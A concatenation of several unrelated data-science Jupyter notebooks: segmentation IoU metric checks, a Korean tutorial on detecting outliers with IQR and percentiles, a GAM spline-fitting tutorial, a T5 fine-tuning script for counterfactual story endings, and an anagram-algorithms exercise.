Print verbose info for metrics: look at number of pixels in intersection, union for each class and each input (`batch * classes` axes)
###Code
metrics_np(y_true, y_pred, metric_name='iou', verbose=True),\
metrics_np(y_true, y_pred, metric_name='iou', metric_type='standard', mean_per_class=True),\
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', verbose=True))
###Output
intersection (pred*true), intersection (pred&true), union (pred+true-inters), union (pred|true)
[[16896 2850 0 0 46316]
[16896 0 0 0 56266]] [[16896 2850 0 0 46316]
[16896 0 0 0 56266]] [[23258 9950 0 0 59778]
[23258 0 0 0 62628]] [[23258 9950 0 0 59778]
[23258 0 0 0 62628]]
intersection, union
[[16896. 2850. 0. 0. 46316.]
[16896. 0. 0. 0. 56266.]] [[23258. 9950. 0. 0. 59778.]
[23258. 0. 0. 0. 62628.]]
[[0.72645974 0.28643215 nan nan 0.7748001 ]
[0.72645974 nan nan nan 0.89841604]]
Counts of inputs with class present, metrics for non-absent classes
[2. 1. 0. 0.] [0.72645974 0.28643224]
###Markdown
Coarse-grained exampleImage with few pixels to explicitly check what is going on at the pixel level
###Code
x,y = np.meshgrid(np.arange(-7,7.1,1), np.arange(-7,7.1,1))
true1 = fuzzy_circle(xy=(2,0), fuzz_factor=0.01)
pred1 = fuzzy_circle(xy=(3,0), fuzz_factor=1)
# two instances of Diamond class: first has IoU=0.33 (half overlap), second one has IoU=0.24
true2 = fuzzy_diamond(xy=(-4,-2),r=1,fuzz_factor=0.01) + fuzzy_diamond(xy=(-3,3),r=1,fuzz_factor=0.01)
pred2 = fuzzy_diamond(xy=(-5,-3),r=1) + fuzzy_diamond(xy=(-5,3),r=1)
empty = np.zeros_like(true1)
# build N*W*H*C ground truth and predicted masks
y_true = np.stack([np.stack([true1, true2, empty, empty, (true1==0) & (true2==0).astype(int)], axis=-1),
np.stack([true1, empty, empty, empty, (true1==0)], axis=-1)])
y_pred = np.stack([np.stack([pred1, pred2, empty, empty, (pred1==0) & (pred2==0).astype(int)], axis=-1),
np.stack([pred1, empty, empty, empty, (pred1==0)], axis=-1)])
# plot predicted masks
plt.pcolormesh(x,y,pred1, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Oranges'), range(256)))[1:]))
plt.pcolormesh(x,y,pred2, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Purples'), range(256)))[1:]))
# plot true masks
plt.pcolormesh(x,y,true1, cmap=mpl.colors.ListedColormap([(0,0,0,0), (1,0,0,0.2)]))
plt.pcolormesh(x,y,true2, cmap=mpl.colors.ListedColormap([(0,0,0,0), (0,0,1,0.2)]))
for i in range(len(x)):
for j in range(len(y)):
if pred1[i][j]!=0:
fmt = '%d' if pred1[i][j] %1 ==0 else '%1.1f'
plt.text(x[i][j]+0.5, y[i][j]+0.5, fmt % pred1[i][j] , ha='center', va='center')
if pred2[i][j]!=0:
fmt = '%d' if pred2[i][j] %1 ==0 else '%1.1f'
plt.text(x[i][j]+0.5, y[i][j]+0.5, fmt % pred2[i][j] , ha='center', va='center')
plt.text(5,6,'Circles\n(I,U)=({:},{:})\nIoU={:1.2f}'.format(np.logical_and(pred1, true1).sum(), np.logical_or(pred1, true1).sum(),
metrics_np(y_true[:1,:,:,:1], y_pred[:1,:,:,:1], metric_name='iou')), color='r', ha='center', va='center')
plt.text(-5.5,0.5,'Diamonds\n(I,U)=({:},{:})\nIoU={:1.2f}'.format(np.logical_and(pred2, true2).sum(), np.logical_or(pred2, true2).sum(),
metrics_np(y_true[:1,:,:,1:2], y_pred[:1,:,:,1:2], metric_name='iou')), color='b', ha='center', va='center')
plt.text(0,-5,'mean IoU={:1.2f}'.format(metrics_np(y_true[:1], y_pred[:1], metric_name='iou')), ha='center', va='bottom');
plt.gca().set_axis_off()
# plt.gca().set(aspect=1)
plt.savefig('metrics_mean_iou_coarse_example.png', bbox_inches='tight')
metrics_np(y_true, y_pred, metric_name='iou',verbose=True),\
metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True),\
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', verbose=True))
###Output
intersection (pred*true), intersection (pred&true), union (pred+true-inters), union (pred|true)
[[ 38 3 0 0 156]
[ 38 0 0 0 173]] [[ 38 3 0 0 156]
[ 38 0 0 0 173]] [[ 52 17 0 0 184]
[ 52 0 0 0 187]] [[ 52 17 0 0 184]
[ 52 0 0 0 187]]
intersection, union
[[ 38. 3. 0. 0. 156.]
[ 38. 0. 0. 0. 173.]] [[ 52. 17. 0. 0. 184.]
[ 52. 0. 0. 0. 187.]]
[[0.7307692 0.1764706 nan nan 0.84782606]
[0.7307692 nan nan nan 0.9251337 ]]
Counts of inputs with class present, metrics for non-absent classes
[2. 1. 0. 0.] [0.7307744 0.17651904]
|
02DataPreprocess/02Outlier.ipynb | ###Markdown
Outlier 처리하기* 통계적으로 outlier, 특이치는 다른 관측치와 크게 다른 데이터 포인트를 말한다.* 특이치는 통계 분석에 문제를 일으킬 수 있다.(평균과 표준편차에 영향을 줌) 이상치 확인하기* [-1.5 * IQR ~ 1.5*IQR] 의 구간에서 벗어나 있는 경우* 백분위 수에서 5th ~ 95th 범위에서 벗어나는 경우
###Code
import pandas as pd
import numpy as np
# outlier를 포함한 임의의 데이터
x = pd.Series([23,1,3,5,34,6,32,7,45,34,78])
x.describe()
###Output
_____no_output_____
###Markdown
보통 통계적으로 [-1.5 * IQR ~ 1.5*IQR] 의 구간에서 벗어나 있는 경우를 outlier라고 한다.
###Code
# 이상치의 인덱스 값을 리턴하는 함수를 만든다.
def idx_of_outliers(x):
q1, q3 = np.percentile(x, [25,75])
IQR = q3 - q1
lower_bound = q1 - [IQR * 1.5]
upper_bound = q3 + [IQR * 1.5]
return np.where((x > upper_bound) | (x < lower_bound))
idx_of_outliers(x.to_numpy())
###Output
_____no_output_____
###Markdown
백분위 수에서 5th ~ 95th 범위에서 벗어나는 경우를 outlier로 할 수도 있다.
###Code
print('5th percentile: ', x.quantile(q=0.05))
print('95th percentile: ', x.quantile(q=0.95))
x[(x < x.quantile(q=0.05)) | (x > x.quantile(q=0.95))]
###Output
_____no_output_____
###Markdown
outlier 처리하기* outliers의 값을 제거* 자연로그를 취해서 값을 감소시키는 방법 등으로 변환
###Code
houses = pd.DataFrame()
houses['Price'] = [534433, 392333, 293222, 4322032]
houses['Bedrooms'] = [2, 3.5, 2, 116]
houses['Square_Feets'] = [1500, 2500, 1500, 48000]
houses
###Output
_____no_output_____
###Markdown
outlier를 처리하는 가장 간단한 방법은 outlier를 삭제하는 것이다.
###Code
houses.describe()
q1 = houses['Bedrooms'].quantile(0.25)
q3 = houses['Bedrooms'].quantile(0.75)
iqr = q3 - q1
# Apply filter with respect to IQR
filter = (houses['Bedrooms'] >= q1 - 1.5*iqr) & (houses['Bedrooms'] <= q3 + 1.5*iqr)
houses.loc[filter]
###Output
_____no_output_____
###Markdown
outlier의 영향이 줄어들도록 column을 변환한다.
###Code
# 로그변환
houses['Log_Square_Feets'] = [np.log(x) for x in houses['Square_Feets']]
houses
###Output
_____no_output_____
###Markdown
Outlier 처리하기* 통계적으로 outlier, 특이치는 다른 관측치와 크게 다른 데이터 포인트를 말한다.* 특이치는 통계 분석에 문제를 일으킬 수 있다.(평균과 표준편차에 영향을 줌) 이상치 확인하기* [-1.5 * IQR ~ 1.5*IQR] 의 구간에서 벗어나 있는 경우* 백분위 수에서 5th ~ 95th 범위에서 벗어나는 경우
###Code
import pandas as pd
import numpy as np
# outlier를 포함한 임의의 데이터
x = pd.Series([23,1,3,5,34,6,32,7,45,34,78])
x.describe()
###Output
_____no_output_____
###Markdown
보통 통계적으로 [Q1-1.5 * IQR ~ Q3+1.5*IQR] 의 구간에서 벗어나 있는 경우를 outlier라고 한다.
###Code
# 이상치의 인덱스 값을 리턴하는 함수를 만든다.
def idx_of_outliers(x):
q1, q3 = np.percentile(x, [25,75])
IQR = q3 - q1
lower_bound = q1 - [IQR * 1.5]
upper_bound = q3 + [IQR * 1.5]
return np.where((x > upper_bound) | (x < lower_bound))
idx_of_outliers(x.values)
###Output
_____no_output_____
###Markdown
백분위 수에서 5th ~ 95th 범위에서 벗어나는 경우를 outlier로 할 수도 있다.
###Code
print('5th percentile: ', x.quantile(q=0.05))
print('95th percentile: ', x.quantile(q=0.95))
x[(x < x.quantile(q=0.05)) | (x > x.quantile(q=0.95))]
###Output
_____no_output_____
###Markdown
outlier 처리하기* outliers의 값을 제거* 자연로그를 취해서 값을 감소시키는 방법 등으로 변환
###Code
houses = pd.DataFrame()
houses['Price'] = [534433, 392333, 293222, 4322032]
houses['Bedrooms'] = [2, 3.5, 2, 116]
houses['Square_Feets'] = [1500, 2500, 1500, 48000]
houses
###Output
_____no_output_____
###Markdown
outlier를 처리하는 가장 간단한 방법은 outlier를 삭제하는 것이다.
###Code
houses.describe()
q1 = houses['Bedrooms'].quantile(0.25)
q3 = houses['Bedrooms'].quantile(0.75)
iqr = q3 - q1
# Apply filter with respect to IQR
filter = (houses['Bedrooms'] >= q1 - 1.5*iqr) & (houses['Bedrooms'] <= q3 + 1.5*iqr)
houses.loc[filter]
###Output
_____no_output_____
###Markdown
outlier의 영향이 줄어들도록 column을 변환한다.
###Code
# 로그변환
houses['Log_Square_Feets'] = [np.log(x) for x in houses['Square_Feets']]
houses
###Output
_____no_output_____ |
content/post/the-guts-of-gams/the-guts-of-gams.ipynb | ###Markdown
This post will explain some of the internals of GAMs: how to estimate the feature functions. First we'll fit some simple splines on some wage data, then we'll fit more complicated splines on some accelerometer data, with a highly non-linear realtionship between in the input and the output.
###Code
import pandas as pd
import patsy
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.preprocessing import PolynomialFeatures
import statsmodels.api as sm
import statsmodels.formula.api as smf
%matplotlib inline
###Output
/Users/thomas.kealy/anaconda3/lib/python3.6/site-packages/statsmodels/compat/pandas.py:56: FutureWarning: The pandas.core.datetools module is deprecated and will be removed in a future version. Please use the pandas.tseries module instead.
from pandas.core import datetools
###Markdown
GAMs are smooth, semi-parametric models of the form:$$ y = \sum_{i=0}^{n-1} \beta_i f_i\left(x_i\right) $$where \\(y\\) is the dependent variable, \\(x_i\\) are the independent variables, \\(\beta\\) are the model coefficients, and \\(f_i\\) are the feature functions.We build the \\(f_i\\) using a type of function called a spline; splines allow us to automatically model non-linear relationships without having to manually try out many different transformations on each variable. First of all, we'll use `patsy` to construct a few spline bases and fit generalised linear models with `statsmodels`. Then, we'll dive into constructing splines ourselves; following Simon Wood's book we'll use penalised regression splines.Firstly, we'll use `patsy` to create some basic pline models. The data we're using comes from https://vincentarelbundock.github.io/Rdatasets/doc/ISLR/Wage.html. It's plotted below:
###Code
df = pd.read_csv('Wage.csv')
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
###Output
_____no_output_____
###Markdown
GAMs are essentially linear models, but in a very special (and useful!) basis made of regression splines. We can use the `bs()` function in `patsy` to create such a basis for us:
###Code
transformed_x1 = patsy.dmatrix("bs(df.age, knots=(25,40,60), degree=3, include_intercept=False)", {"df.age": df.age}, return_type='dataframe')
fit1 = sm.GLM(df.wage, transformed_x1).fit()
fit1.params
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
pred = fit1.predict(patsy.dmatrix("bs(age_grid, knots=(25,40,60), include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred, color='b', label='Specifying three knots')
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
###Output
_____no_output_____
###Markdown
Here we have prespecified knots at ages 25, 40, and 60. This produces a spline with six basis functions. A cubic spline has 7 degrees of freedom: one for the intercept, and two for each order. We could also have specified knot points at uniform quantiles of the data:
###Code
# Specifying 6 degrees of freedom
transformed_x2 = patsy.dmatrix("bs(df.age, df=6, include_intercept=False)",
{"df.age": df.age}, return_type='dataframe')
fit2 = sm.GLM(df.wage, transformed_x2).fit()
fit2.params
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
pred = fit2.predict(patsy.dmatrix("bs(age_grid, df=6, include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred, color='b', label='Specifying three knots')
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
###Output
_____no_output_____
###Markdown
Finally, we can also fit natural splines with the `cr()` function:
###Code
# Specifying 4 degrees of freedom
transformed_x3 = patsy.dmatrix("cr(df.age, df=4)", {"df.age": df.age}, return_type='dataframe')
fit3 = sm.GLM(df.wage, transformed_x3).fit()
fit3.params
pred = fit3.predict(patsy.dmatrix("cr(age_grid, df=4)", {"age_grid": age_grid}, return_type='dataframe'))
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred, color='g', label='Natural spline df=4')
plt.legend()
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
###Output
_____no_output_____
###Markdown
Let's see how these fits all stack together:
###Code
# Generate a sequence of age values spanning the range
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
# Make some predictions
pred1 = fit1.predict(patsy.dmatrix("bs(age_grid, knots=(25,40,60), include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
pred2 = fit2.predict(patsy.dmatrix("bs(age_grid, df=6, include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
pred3 = fit3.predict(patsy.dmatrix("cr(age_grid, df=4)", {"age_grid": age_grid}, return_type='dataframe'))
# Plot the splines and error bands
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred1, color='b', label='Specifying three knots')
plt.plot(age_grid, pred2, color='r', label='Specifying df=6')
plt.plot(age_grid, pred3, color='g', label='Natural spline df=4')
plt.legend()
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import patsy
import scipy as sp
import seaborn as sns
from statsmodels import api as sm
%matplotlib inline
df = pd.read_csv('mcycle.csv')
df = df.drop('Unnamed: 0', axis=1)
fig, ax = plt.subplots(figsize=(8, 6))
blue = sns.color_palette()[0]
ax.scatter(df.times, df.accel, c=blue, alpha=0.5)
ax.set_xlabel('time')
ax.set_ylabel('Acceleration')
###Output
_____no_output_____
###Markdown
As discussed earlier: GAMs are smooth, semi-parametric models of the form:$$ y = \sum_{i=0}^{n-1} \beta_i f_i\left(x_i\right) $$where \\(y\\) is the dependent variable, \\(x_i\\) are the independent variables, \\(\beta\\) are the model coefficients, and \\(f_i\\) are the feature functions.We build the \\(f_i\\) using a type of function called a spline. Since our data is 1D, we can model it as:$$ y = \beta_0 + f\left( x \right) + \varepsilon $$We must also choose a basis for \\( f \\):$$ f \left( x \right) = \beta_1 B_1\left(x\right) + \ldots + \beta_k B_k\left(x\right) $$We define $$ X = \left[1, x_1, \ldots, x_k \right] $$so we can write:$ y = \beta_0 + f\left( x \right) + \varepsilon = X\beta + \varepsilon $$We choose to minimise the sum of squares again, this time with a regularisation term:$$ \frac{1}{2} \lVert y - X\beta \rVert + \lambda \int_0^1 f''\left(x\right)^2 dx $$You can show (you, not me!) that the second term can always be written:$$ \int_0^1 f''\left(x\right)^2 dx = \beta^T S \beta $$where \\( S \\) is a postive (semi)-definiate matrix (i.e. all it's eigenvalues are positive or 0). Therefore our objective function becomes:$$ \frac{1}{2} \lVert y - X\beta \rVert + \lambda \beta^T S \beta dx $$ and we can use the techniques we've developed fitting linear models to fit additive models! We'll start by fitting a univariate spline, then maybe something more complicated.
###Code
def R(x, z):
return ((z - 0.5)**2 - 1 / 12) * ((x - 0.5)**2 - 1 / 12) / 4 - ((np.abs(x - z) - 0.5)**4 - 0.5 * (np.abs(x - z) - 0.5)**2 + 7 / 240) / 24
R = np.frompyfunc(R, 2, 1)
def R_(x):
return R.outer(x, knots).astype(np.float64)
q = 20
knots = df.times.quantile(np.linspace(0, 1, q))
y, X = patsy.dmatrices('accel ~ times + R_(times)', data=df)
S = np.zeros((q + 2, q + 2))
S[2:, 2:] = R_(knots)
B = np.zeros_like(S)
B[2:, 2:] = np.real_if_close(sp.linalg.sqrtm(S[2:, 2:]), tol=10**8)
def fit(y, X, B, lambda_=1.0):
# build the augmented matrices
y_ = np.vstack((y, np.zeros((q + 2, 1))))
X_ = np.vstack((X, np.sqrt(lambda_) * B))
return sm.OLS(y_, X_).fit()
min_time = df.times.min()
max_time = df.times.max()
plot_x = np.linspace(min_time, max_time, 100)
plot_X = patsy.dmatrix('times + R_(times)', {'times': plot_x})
results = fit(y, X, B)
fig, ax = plt.subplots(figsize=(8, 6))
blue = sns.color_palette()[0]
ax.scatter(df.times, df.accel, c=blue, alpha=0.5)
ax.plot(plot_x, results.predict(plot_X))
ax.set_xlabel('time')
ax.set_ylabel('accel')
ax.set_title(r'$\lambda = {}$'.format(1.0))
###Output
_____no_output_____ |
huggingface_t5_3_1.ipynb | ###Markdown
Preparation
###Code
from google.colab import drive
drive.mount('/content/drive')
root = 'drive/MyDrive/LM/'
!pip install sentencepiece
!pip install transformers -q
!pip install wandb -q
# Importing stock libraries
import numpy as np
import pandas as pd
import time
from tqdm import tqdm
import os
import regex as re
import torch
from torch import cuda
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader, RandomSampler, SequentialSampler
# Importing the T5 modules from huggingface/transformers
from transformers import T5Tokenizer, T5ForConditionalGeneration
# WandB – Import the wandb library
import wandb
# Checking out the GPU we have access to. This is output is from the google colab version.
!nvidia-smi
# # Setting up the device for GPU usage
device = 'cuda' if cuda.is_available() else 'cpu'
print("Device is: ", device)
# Set random seeds and deterministic pytorch for reproducibility
SEED = 42
torch.manual_seed(SEED) # pytorch random seed
np.random.seed(SEED) # numpy random seed
torch.backends.cudnn.deterministic = True
# Login to wandb to log the model run and all the parameters
# 7229adacb32965027d73056a6927efd0365a00bc
!wandb login
# Global Parameter
model_version = "3.1"
# WandB – Initialize a new run
wandb.init(project="counterfactual"+model_version)
# WandB – Config is a variable that holds and saves hyperparameters and inputs
# Defining some key variables that will be used later on in the training
config = wandb.config # Initialize config
config.TRAIN_BATCH_SIZE = 16 # input batch size for training (default: 64)
config.VALID_BATCH_SIZE = 32 # input batch size for testing (default: 1000)
config.TRAIN_EPOCHS = 51 # number of epochs to train (default: 10)
config.VAL_EPOCHS = 1
config.LEARNING_RATE = 1e-4 # learning rate (default: 0.01)
config.SEED = 42 # random seed (default: 42)
config.SOURCE_LEN = 150
config.TARGET_LEN = 110
config.LOAD_PATH = root+'models/model'+model_version+'.tar'
config.SAVE_PATH = root+'models/model'+model_version+'.tar'
PRETRAINED_MODEL_NAME = "t5-base"
# tokenzier for encoding the text
tokenizer = T5Tokenizer.from_pretrained(PRETRAINED_MODEL_NAME)
# Defining the model. We are using t5-base model and added a Language model layer on top for generation of Summary.
# Further this model is sent to device (GPU/TPU) for using the hardware.
model = T5ForConditionalGeneration.from_pretrained(PRETRAINED_MODEL_NAME)
model = model.to(device)
# Defining the optimizer that will be used to tune the weights of the network in the training session.
optimizer = torch.optim.Adam(params = model.parameters(), lr=config.LEARNING_RATE)
###Output
_____no_output_____
###Markdown
Load dataframe
###Code
#training df
small_path = root + '/TimeTravel/train_supervised_small.json'
small_df = pd.read_json(small_path, lines=True)
small_df.head()
print(small_df.loc[:,"edited_ending"][0])
# text_a: source, text_b: target
text_a, text_b = [], []
for i in range(len(small_df)):
text_a.append("premise: " + small_df.loc[i, 'premise'] + " initial: " + \
small_df.loc[i, 'initial'] + " counterfactual: " + small_df.loc[i, 'counterfactual'] + \
" original_ending: " + small_df.loc[i, 'original_ending'])
#text_a.append(re.sub(re_pat, df.loc[i, 'edit1'], df.loc[i, 'original1']))
text_b.append("edited_ending: " + small_df.loc[i, 'edited_ending'][0] +" "+ small_df.loc[i, 'edited_ending'][1] +" "+ \
small_df.loc[i, 'edited_ending'][2])
train_df = pd.DataFrame({'source_text': text_a, 'target_text': text_b})
train_df.head()
print(train_df.loc[0, "source_text"])
print("-------------")
print(train_df.loc[0, "target_text"])
print(train_df.shape)
#train_df = train_df[0:4000]
source_lens = train_df.source_text.apply(lambda x: len(tokenizer.encode_plus(x, return_tensors='pt').input_ids.squeeze())).to_list()
target_lens = train_df.target_text.apply(lambda x: len(tokenizer.encode_plus(x, return_tensors='pt').input_ids.squeeze())).to_list()
print("Max source length is: ", max(source_lens))
print("Max target length is: ", max(target_lens))
# valid df
large_path = root + '/TimeTravel/train_supervised_large.json'
df_large = pd.read_json(large_path, lines=True)
print(len(df_large))
small_ids = []
for i in range(len(small_df)):
small_ids.append(small_df.loc[i, 'story_id'])
print(len(small_ids))
df_large = df_large[~df_large.story_id.isin(small_ids)]
df_large = df_large.reset_index() # must reset index after delete rows
print(len(df_large))
# select data not in training set
#part_df_large = df_large[0:100]
part_df_large = df_large[0:1000]
part_df_large = part_df_large.reset_index()
print(len(part_df_large))
text, gt = [],[] # gt for ground truth
for i in range(len(part_df_large)):
text.append("premise: " + part_df_large.loc[i, 'premise'] + \
" initial: " + part_df_large.loc[i, 'initial'] + \
" counterfactual: " + part_df_large.loc[i, 'counterfactual'] + \
" original_ending: " + part_df_large.loc[i, 'original_ending'])
gt.append("edited_ending: " + part_df_large.loc[i, 'edited_ending'][0] +" "+ \
part_df_large.loc[i, 'edited_ending'][1] +" "+ part_df_large.loc[i, 'edited_ending'][2])
print(len(text))
valid_df = pd.DataFrame({'source_text': text, 'target_text': gt})
valid_df.head()
###Output
_____no_output_____
###Markdown
Dataset and Dataloader
###Code
# Creating a custom dataset for reading the dataframe and loading it into the dataloader to pass it to the neural network at a later stage for finetuning the model and to prepare it for predictions
class CustomDataset(Dataset):
def __init__(self, dataframe, tokenizer, ori_len, con_len):
self.tokenizer = tokenizer
self.data = dataframe
self.ori_len = ori_len
self.con_len = con_len
self.original = self.data.source_text
self.counterfactual = self.data.target_text
def __len__(self):
return len(self.counterfactual)
def __getitem__(self, index):
original = str(self.original[index])
# original = ' '.join(original.split())
counterfactual = str(self.counterfactual[index])
# counterfactual = ' '.join(counterfactual.split())
source = self.tokenizer.encode_plus(original, max_length= self.ori_len, padding='max_length', return_tensors='pt')
target = self.tokenizer.encode_plus(counterfactual, max_length= self.con_len, padding='max_length', return_tensors='pt')
source_ids = source['input_ids'].squeeze()
source_mask = source['attention_mask'].squeeze()
target_ids = target['input_ids'].squeeze()
target_mask = target['attention_mask'].squeeze()
return {
'source_ids': source_ids.to(dtype=torch.long),
'source_mask': source_mask.to(dtype=torch.long),
'target_ids': target_ids.to(dtype=torch.long),
'target_ids_y': target_ids.to(dtype=torch.long)
}
trainingset = CustomDataset(dataframe=train_df, tokenizer=tokenizer, ori_len=config.SOURCE_LEN , con_len=config.TARGET_LEN )
validset = CustomDataset(dataframe=valid_df, tokenizer=tokenizer, ori_len=config.SOURCE_LEN , con_len=config.TARGET_LEN )
# pick up a data sample
sample_idx = 4
sample = trainingset[sample_idx]
source_ids = sample["source_ids"]
source_mask = sample["source_mask"]
target_ids = sample["target_ids"]
target_ids_y = sample["target_ids_y"]
print(source_ids)
print(train_df.iloc[sample_idx].target_text)
sen = tokenizer.decode(target_ids, skip_special_tokens=False) # skip_special_tokens=True will be completely same.
print(sen)
# DataLoader
train_params = {
'batch_size': config.TRAIN_BATCH_SIZE,
'shuffle': True,
'num_workers': 2
}
val_params = {
'batch_size': config.VALID_BATCH_SIZE,
'shuffle': False,
'num_workers': 2
}
training_loader = DataLoader(trainingset, **train_params)
val_loader = DataLoader(validset, **val_params)
print(len(training_loader))
print(len(val_loader))
###Output
1047
32
###Markdown
Define train() and val()
###Code
def save_model(epoch, model, optimizer, loss, PATH):
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss
}, PATH)
def load_model(PATH):
checkpoint = torch.load(PATH)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
epoch = checkpoint['epoch']
loss = checkpoint['loss']
return model, optimizer, epoch, loss
# Creating the training function. This will be called in the main function. It is run depending on the epoch value.
# The model is put into train mode and then we wnumerate over the training loader and passed to the defined network
def train(epoch, tokenizer, model, device, loader, optimizer):
model.train()
for i,data in enumerate(loader):
#len(loader)=10xx
ids = data['source_ids'].to(device, dtype = torch.long)
mask = data['source_mask'].to(device, dtype = torch.long)
y = data['target_ids'].to(device, dtype = torch.long)
# padded ids (pad=0) are set to -100, which means ignore for loss calculation
y[y[: ,:] == tokenizer.pad_token_id ] = -100
label_ids = y.to(device)
outputs = model(input_ids = ids, attention_mask = mask, labels=label_ids)
loss = outputs[0]
#logit = outputs[1]
if i%50 == 0:
wandb.log({"Training Loss": loss.item()})
if i%600==0:
print(f'Epoch: {epoch}, Loss: {loss.item()}')
optimizer.zero_grad()
loss.backward()
optimizer.step()
# xm.optimizer_step(optimizer)
# xm.mark_step()
if (epoch % 5 == 0):
save_model(epoch, model, optimizer, loss.item(), config.SAVE_PATH)
def validate(tokenizer, model, device, loader):
model.eval()
predictions = []
actuals = []
raws = []
with torch.no_grad():
for i, data in enumerate(loader):
y = data['target_ids'].to(device, dtype = torch.long)
ids = data['source_ids'].to(device, dtype = torch.long)
mask = data['source_mask'].to(device, dtype = torch.long)
generated_ids = model.generate(
input_ids = ids,
attention_mask = mask,
num_beams=2,
max_length=config.TARGET_LEN,
repetition_penalty=2.5,
length_penalty=1.0,
early_stopping=True
)
raw = [tokenizer.decode(i, skip_special_tokens=True, clean_up_tokenization_spaces=True) for i in ids]
preds = [tokenizer.decode(i, skip_special_tokens=True, clean_up_tokenization_spaces=True) for i in generated_ids]
target = [tokenizer.decode(i, skip_special_tokens=True, clean_up_tokenization_spaces=True)for i in y]
if i%3==0:
print(f'valid Completed {(i+1)* config.VALID_BATCH_SIZE}')
raws.extend(raw)
predictions.extend(preds)
actuals.extend(target)
return raws, predictions, actuals
###Output
_____no_output_____
###Markdown
main
###Code
import time
# Helper function to print time between epochs
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
# Log metrics with wandb
#wandb.watch(model, log="all")
# Training loop
print('Initiating Fine-Tuning for the model on counterfactual dataset:')
for epoch in range(config.TRAIN_EPOCHS):
#for epoch in tqdm(range(config.TRAIN_EPOCHS)):
start_time = time.time()
train(epoch, tokenizer, model, device, training_loader, optimizer)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
print(f'Epoch: {epoch:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')
# Mark the run as finished
wandb.finish()
# Load model
# model = T5ForConditionalGeneration.from_pretrained(PRETRAINED_MODEL_NAME)
# model = model.to(device)
# optimizer = torch.optim.Adam(params = model.parameters(), lr=config.LEARNING_RATE)
# model, optimizer, epoch, loss = load_model(config.LOAD_PATH)
# Validation loop and saving the resulting file with predictions and acutals in a dataframe.
# Saving the dataframe as predictions.csv
print('Now inferecing:')
start_time = time.time()
raws, predictions, actuals = validate(tokenizer, model, device, val_loader)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
print(f'Time: {epoch_mins}m {epoch_secs}s')
final_df = pd.DataFrame({'raw_text': raws, 'ground_truth': actuals, 'generated_text': predictions})
#final_df.to_csv(root + 'results/' + 'output' + model_version + '.csv')
final_df.to_excel(root + 'results/' + 'output' + model_version + '.xlsx')
print('Output Files generated for review')
print(len(actuals))
###Output
1000
|
notebooks/algorithms.ipynb | ###Markdown
Algorithms [Click here to run this chapter on Colab](https://colab.research.google.com/github/AllenDowney/DSIRP/blob/main/notebooks/algorithms.ipynb) Searching for anagramsIn this notebook we'll implement algorithms for two tasks:* Testing a pair of words to see if they are anagrams of each other, that is, if you can rearrange the letters in one word to spell the other.* Searching a list of words for all pairs that are anagrams of each other.There is a point to these examples, which I will explain at the end. **Exercise 1:** Write a function that takes two words and returns `True` if they are anagrams. Test your function with the examples below.
###Code
def is_anagram(word1, word2):
return False
is_anagram('tachymetric', 'mccarthyite') # True
is_anagram('post', 'top') # False, letter not present
is_anagram('pott', 'top') # False, letter present but not enough copies
is_anagram('top', 'post') # False, letters left over at the end
is_anagram('topss', 'postt') # False
###Output
_____no_output_____
###Markdown
**Exercise 2:** Use `timeit` to see how fast your function is for these examples:
###Code
%timeit is_anagram('tops', 'spot')
%timeit is_anagram('tachymetric', 'mccarthyite')
###Output
_____no_output_____
###Markdown
NOTE: How can we compare algorithms running on different computers? Searching for anagram pairs **Exercise 3:** Write a function that takes a word list and returns a list of all anagram pairs.
###Code
short_word_list = ['proudest', 'stop', 'pots', 'tops', 'sprouted']
def all_anagram_pairs(word_list):
return []
all_anagram_pairs(short_word_list)
###Output
_____no_output_____
###Markdown
The following cell downloads a file containing a list of English words.
###Code
from os.path import basename, exists
def download(url):
filename = basename(url)
if not exists(filename):
from urllib.request import urlretrieve
local, _ = urlretrieve(url, filename)
print('Downloaded ' + local)
download('https://github.com/AllenDowney/DSIRP/raw/main/american-english')
###Output
_____no_output_____
###Markdown
The following function reads a file and returns a set of words (I used a set because after we convert words to lower case, there are some repeats.)
###Code
def read_words(filename):
"""Read lines from a file and split them into words."""
res = set()
for line in open(filename):
for word in line.split():
res.add(word.strip().lower())
return res
word_list = read_words('american-english')
len(word_list)
###Output
_____no_output_____
